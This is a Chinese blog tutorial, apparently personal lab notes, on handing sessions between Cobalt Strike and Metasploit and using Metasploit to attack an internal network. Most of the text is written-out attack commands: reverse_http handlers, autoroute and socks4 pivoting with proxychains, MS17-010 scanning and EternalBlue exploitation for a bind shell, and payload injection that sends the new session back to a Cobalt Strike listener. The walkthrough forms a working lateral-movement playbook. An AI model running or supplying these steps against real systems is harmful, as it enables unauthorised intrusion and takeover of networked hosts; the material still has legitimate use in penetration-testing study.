MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击

文章目录

  • 前言
  • 一、将CS会话派生给MSF
    • 1、前期准备:
    • 2、Cobaltstrike派生会话给MSF
  • 二、MSF进行内网攻击
    • 1、前言:
    • 2、攻击步骤如下
  • 三、将MSF中的会话派生给CS
    • 1、前言
    • 2、使用步骤:
  • 总结


前言

本文主要介绍MSF与CobaltStrike联动相互进行会话派生,这样可以最大化利用这两个工具的优点。同时这里还进行了衍生,通过将会话传到MSF上,MSF通过添加路由来访问内网主机,再用MSF进行永恒之蓝攻击拿下shell,并派生回CobaltStrkie。

当前网络设置为:

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第1张图片


一、将CS会话派生给MSF

1、前期准备:

1)、CS上线一台主机,这里就是上线图中的跳板机
2)、因为我的MSF是在本地的kail中,需要使用frp进行代理穿透,将其映射到公网上。

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第2张图片MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第3张图片

2、Cobaltstrike派生会话给MSF

1)CS创建新的监听器,地址为MSF地址,端口为MSF监听端口
注:这里的端口为kail里面frp中remote_port的端口

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第4张图片

2)msf创建监听
1)use exploit/multi/handler 
2set payload windows/meterpreter/reverse_http 
3set lhost 127.0.0.1
4set lport 7000
5)run

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第5张图片

3)cs在现有会话基础上右键选择增加会话,msf就可以接收来自CS的会话

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第6张图片
在这里插入图片描述MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第7张图片

二、MSF进行内网攻击

1、前言:

因为MSF上面集成了很多攻击手段,相较与CS而言,我们可以进行更好的利用,这里测试通过接收的会话为跳板机进行内网永恒之蓝攻击。

2、攻击步骤如下

1)通过当前sessions配置路由:需要回到meterpreter界面
run get_local_subnets #获取网络接口
run autoroute -p #查看路由地址
run autoroute -s 192.168.89.0/24 #添加路由地址

#注:还可以使用如下方法添加socks4代理
meterpreter> use auxiliary/server/socks4a
meterpreter> set srvport 2222
meterpreter> exploit
#配置 proxychains
vim /etc/proxychains.conf
socks4 192.168.76.132 2222 # 添加

#测试效果:
proxychains4 nmap -sT -Pn 192.168.89.3 -p3306

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第8张图片MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第9张图片MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第10张图片MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第11张图片

2)内网主机渗透:
#1> 检查那些主机存在MS17_010漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.89.0/24
set threads 50
run
#2> 针对漏洞主机进行攻击
use exploit/windows/smb/ms17_010_eternalblue 
set payload windows/x64/meterpreter/bind_tcp # 设置正向连接,因为目标在内网,所以需要设置成正向连接目标主机才能执行成功。
set rhost 192.168.89.3
run

#3> 升级shell,将shell升级为meterpretershell,这样是为了将MSF会话派生到CS
sessions -u 1 #升级shell

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第12张图片MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第13张图片
在这里插入图片描述

三、将MSF中的会话派生给CS

1、前言

通过MSF进行永恒之蓝攻击,拿下了新的会话,这个时候我们可以把新会话传递给CS中,进行功能互补。

2、使用步骤:

1)在CS上面设置监听:

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第14张图片

2)msf配置:
1)use exploit/windows/local/payload_inject
2set payload windows/meterpreter/reverse_http
3set DisablePayloadHandler true
4set lhost x.x.x.x  #cobaltstrike监听的ip
5set lport 6789   #cobaltstrike监听的端口 
6set session 1    #这里是获得的session的id
7)run

MSF与CobaltStrike联动相互会话派生,并通过MSF进行内网攻击_第15张图片


总结

MSF与CobaltStrike联动同时攻击方法如上,本博客主要是自己用来记录使用流程。本人才疏学浅,还有很多不会之处,所以上述文章中肯定也有不正确的地方,针对不正确的地方欢迎各位大佬批评指出。

你可能感兴趣的:(内网渗透学习,安全,安全漏洞,网络安全,网络)